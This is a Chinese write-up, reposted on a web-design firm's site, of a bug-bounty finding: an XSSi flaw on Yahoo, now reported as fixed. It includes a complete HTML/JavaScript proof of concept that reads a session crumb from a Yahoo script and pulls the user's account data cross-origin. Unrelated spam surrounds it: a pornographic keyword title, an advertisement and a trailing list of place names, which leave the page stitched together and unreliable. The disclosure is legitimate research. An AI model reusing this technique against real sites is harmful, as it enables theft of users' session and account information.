内射老阿姨1区2区3区4区_久久精品人人做人人爽电影蜜月_久久国产精品亚洲77777_99精品又大又爽又粗少妇毛片

發(fā)現(xiàn)雅虎XSSi漏洞實現(xiàn)用戶信息竊取的示例分析

本篇文章為大家展示了發(fā)現(xiàn)雅虎XSSi漏洞實現(xiàn)用戶信息竊取的示例分析,內(nèi)容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細(xì)介紹希望你能有所收獲。

為潮安等地區(qū)用戶提供了全套網(wǎng)頁設(shè)計制作服務(wù),及潮安網(wǎng)站建設(shè)行業(yè)解決方案。主營業(yè)務(wù)為做網(wǎng)站、成都網(wǎng)站設(shè)計、潮安網(wǎng)站設(shè)計,以傳統(tǒng)方式定制建設(shè)網(wǎng)站,并提供域名空間備案等一條龍服務(wù),秉承以專業(yè)、用心的態(tài)度為用戶提供真誠的服務(wù)。我們深信只要達(dá)到每一位用戶的要求,就會得到認(rèn)可,從而選擇與我們長期合作。這樣,我們也可以走得更遠(yuǎn)!

發(fā)現(xiàn)某種特定類別漏洞由兩個關(guān)鍵部分組成,那就是對漏洞的認(rèn)知以及挖掘的難易程度??缯灸_本包含漏洞(XSSi)在公認(rèn)的安全標(biāo)準(zhǔn)OWASP TOP 10中并未被提及,而且它也沒有一些公開可利用的工具。但它的影響涉及個人存儲信息泄露、token保護(hù)機(jī)制繞過以及賬戶劫持等。目前來說,由于XSSi漏洞存在廣泛且缺乏有效的檢測手段,導(dǎo)致其漏洞危害程度增加。下面我將分享我發(fā)現(xiàn)的一個雅虎XSSi漏洞,利用該漏洞可以實現(xiàn)對雅虎用戶的信息竊取。

端倪

在參與雅虎(Yahoo)漏洞眾測項目中,在我某次用BurpSuite來進(jìn)行抓包分析時,偶然看到了以下這個請求:

發(fā)現(xiàn)雅虎XSSi漏洞實現(xiàn)用戶信息竊取的示例分析

在我發(fā)現(xiàn)這是一個JSONP服務(wù)端之后,我立馬意識到這可能會形成一個XSSi漏洞(跨站腳本包含)。在雅虎網(wǎng)站API中,.crumb 值其實就是一個隨機(jī)字符串,它與用戶的session和身份驗證值相關(guān),我注意到,如果在該請求中,GET參數(shù) .crumb 值無效的話,其響應(yīng)如下:

發(fā)現(xiàn)雅虎XSSi漏洞實現(xiàn)用戶信息竊取的示例分析

利用

現(xiàn)在,我想,如果能以某種方式去竊取到受害者的有效.crumb 值的話,那么就能竊取到對方的具體賬號信息值了。因此,我就在BurpSuite的抓包中來查找所有包含有效 .crumb 值的請求,最終,我發(fā)現(xiàn)了在某個動態(tài)的Javascript文件存在這樣的信息,該Javascript文件位于https://messenger.yahoo.com/embed/app.js。如果你現(xiàn)在去檢查這個Javascript文件,你會發(fā)現(xiàn)它其中的    logoutCrumb 值已經(jīng)被刪除修復(fù)了,我初次發(fā)現(xiàn)時,它的源代碼如下: 

發(fā)現(xiàn)雅虎XSSi漏洞實現(xiàn)用戶信息竊取的示例分析

現(xiàn)在,XSSi 漏洞原理其實是這樣的,它允許攻擊者繞過原始邊界竊取特定類型數(shù)據(jù),利用了<script>標(biāo)記的src屬性來突破同源策略( SOP),也即在<script>標(biāo)記中,瀏覽器不會阻止網(wǎng)頁加載圖像和文字等第三方資源。因此,為了竊取    https://messenger.yahoo.com/embed/app.js中的有效回調(diào) .crumb 值,然后把它放置在鏈接https://jsapi.login.yahoo.com/w/device_users?.crumb=POR1.kRjsx中進(jìn)行請求,以獲取到相關(guān)用戶的session信息,我編寫了如下PoC代碼:

<html>    <head>        <title>Yahoo XSSi PoC</title>    </head>    <body>               <div >            <h2 >Proof of Concept</h2>            <b>Dataset 1:</b>            <div id="content1" ></div>            <br/>            <b>Dataset 2:</b>            <div id="content2" ></div>        </div>        <script>            function processDeviceUsers(data) {                document.getElementById("content1").innerHTML = JSON.stringify(data);            }            window.onload = function () {                var config = {};                config_data = {};                config.merge = function(data) { config_data = data };                iris.initConfig(config);                document.getElementById("content2").innerHTML =  JSON.stringify(config_data);                var src = "https://jsapi.login.yahoo.com/w/device_users?.crumb=" + config_data.session.logoutCrumb;                var s = document.createElement('script');                s.setAttribute('src', src);                document.body.appendChild(s);            }           </script>        <script src="https://messenger.yahoo.com/embed/app.js"></script>        <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>    </body></html>

以下就是測試的效果圖:

發(fā)現(xiàn)雅虎XSSi漏洞實現(xiàn)用戶信息竊取的示例分析

上述內(nèi)容就是發(fā)現(xiàn)雅虎XSSi漏洞實現(xiàn)用戶信息竊取的示例分析,你們學(xué)到知識或技能了嗎?如果還想學(xué)到更多技能或者豐富自己的知識儲備,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。

分享題目:發(fā)現(xiàn)雅虎XSSi漏洞實現(xiàn)用戶信息竊取的示例分析
分享路徑:http://www.rwnh.cn/article46/psgihg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供標(biāo)簽優(yōu)化、App開發(fā)商城網(wǎng)站、軟件開發(fā)網(wǎng)站排名、手機(jī)網(wǎng)站建設(shè)

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

外貿(mào)網(wǎng)站建設(shè)
武汉市| 安龙县| 光泽县| 集安市| 霞浦县| 东海县| 德兴市| 东乌珠穆沁旗| 余庆县| 车致| 左云县| 枣庄市| 富蕴县| 潜山县| 玉田县| 五家渠市| 石嘴山市| 白银市| 高邮市| 通辽市| 阿瓦提县| 平乡县| 平果县| 邢台县| 龙里县| 河南省| 新营市| 滦南县| 自贡市| 比如县| 松原市| 沈丘县| 广平县| 姜堰市| 峨山| 临猗县| 曲阜市| 枝江市| 白朗县| 贺兰县| 泰宁县|